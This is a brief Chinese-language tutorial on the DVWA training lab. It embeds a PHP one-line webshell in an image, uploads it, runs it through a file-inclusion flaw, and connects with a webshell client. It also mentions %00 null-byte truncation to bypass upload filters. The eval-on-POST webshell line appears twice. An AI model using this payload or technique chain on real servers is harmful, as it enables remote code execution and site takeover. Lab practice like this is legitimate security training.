DVWA的文件上傳漏洞(high)


1.使用文件包含漏洞和文件上傳漏洞,來連接shell

文件包含漏洞詳細的漏洞介紹:https://blog.csdn.net/Vansnc/article/details/82528395

 

文件包含函數加載的參數沒有經過過濾或者嚴格的定義,可以被用戶控制,包含其他惡意文件,導致了執行了非預期的代碼

 

以dvwa靶機為例

我們先在文件上傳漏洞的地方上傳一張夾着一句話木馬的圖片:

 

使用edjpg工具,在圖片里寫入木馬(使用方法:把圖片拖到exe文件)

 

插入如下木馬:

<?php eval($_POST[pass]);?>'

或者cmd插木馬:https://www.jianshu.com/p/02c281f2471a

注意這里圖片文件太大可能無法上傳,建議選擇10kb左右的文件

<?php eval($_POST[pass]);?>(遠程連接密碼為pass的webshell)

 

上傳之后在文件上傳漏洞頁面打開訪問,只會返回靜態內容,文件不會被執行

 

我們需要轉到文件包含漏洞的頁面,通過page來訪問圖片文件並執行,

執行之后網頁上顯示的會是亂碼

 

執行過后就可以使用菜刀連接webshell了

 

2.此外文件上傳漏洞也可以用文件名后綴%00截斷繞過過濾

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM